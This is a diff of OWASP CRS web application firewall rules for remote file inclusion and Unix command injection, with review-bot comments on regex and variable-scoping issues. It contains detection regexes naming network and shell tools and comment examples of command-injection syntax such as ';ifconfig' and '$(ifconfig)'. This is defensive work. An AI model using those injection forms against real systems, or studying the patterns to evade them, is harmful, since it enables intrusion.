@@ -90,21 +89,31 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ +# url:file:// can be used by Java applications using +# org.apache.commons.io.IOUtils to access internal files, so this has been added +# +# This rule has one (stricter) sibling: 931131. +# That rule applies the same regular expression to the request filename in phase 1. +# +# Regular expression generated from regex-assembly/931130.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931130 +# +SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ "id:931130,\ phase:2,\ block,\ 
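Review bot: The userinfo group `(?:[^@]+@)?` in the new 931130 expression does not exclude `/`, so the value captured by `([^/]*)` and compared by the chained `!@endsWith .%{request_headers.host}` check is only the authority component when no later URL component contains `@`; `(?:[^@/]+@)?` keeps the capture on the host. Since the expression is generated, the change belongs in `regex-assembly/931130.ra` followed by `crs-toolchain regex update 931130`, and the identical pattern in 931131 in the hunk below needs the same treatment. The new expression also drops the `^` anchor of the old `^(?i:file|ftps?|https?)://([^/]*).*$`, so a scheme reference anywhere inside an argument now matches; that widening looks intended but deserves one sentence in the comment block above the rule, e.g. `# The expression is deliberately unanchored so that embedded references such as url:file:// are in scope.`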
@@ -119,29 +128,57 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" +# This is a (stricter) sibling of 931130. +# +# Regular expression generated from regex-assembly/931131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931131 +# +SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ + "id:931131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + 
tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf index 656fd6fde2..45f3ca6225 100644 --- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf 
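Review bot: The variable 931131 sets in phase 1 (`tx.rfi_parameter_%{MATCHED_VAR_NAME}`) stays in the TX collection when 931130's chained `SecRule TX:/rfi_parameter_.*/` runs in phase 2, so the two rules do not appear to be independent: once 931130's parent rule matches on an argument, its chain also re-evaluates the phase-1 variable. Whether that can add a second critical score for a single off-domain filename reference depends on how the engine applies the chained setvar across several matching variables, which is not visible here, but it merits a regression test or a comment. If the coupling is unintended, a distinct prefix for the phase-1 rule, `setvar:'tx.rfi_filename_%{MATCHED_VAR_NAME}=.%{tx.1}'` with its chain targeting `TX:/rfi_filename_.*/`, separates the two.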
+++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -49,7 +50,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf # \n ;\nifconfig # \r ;\rifconfig # \$\( $(ifconfig) -# $\(\( $((ifconfig)) +# \$\(\( $((ifconfig)) # ` `ifconfig` # \${ ${ifconfig} # <\( <( ifconfig ) 
@@ -71,9 +72,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf # # 4. Paths # -# [\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. -# -# This rule is case-sensitive to prevent FP ("Cat" vs. "cat"). +# [\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. # # An effort was made to combat evasions by shell quoting (e.g. 'ls', # 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine 
@@ -82,30 +81,50 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAf # useful for this case. However, emulating the transformation makes # the regexp more complex. # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Then insert the assembled regexp into this template: -# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932100.txt] -# \b" \ -# # This is the base Rule to prevent Unix Command Injection -# Please refer other rules 932105,932106 to know more. -# -# .932100 -# ├── 932105 -# ├── 932106 -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]
*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\
\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" \ - "id:932100,\ +# for prefix + two and three characters. 
+# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932230.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932230 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?
-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[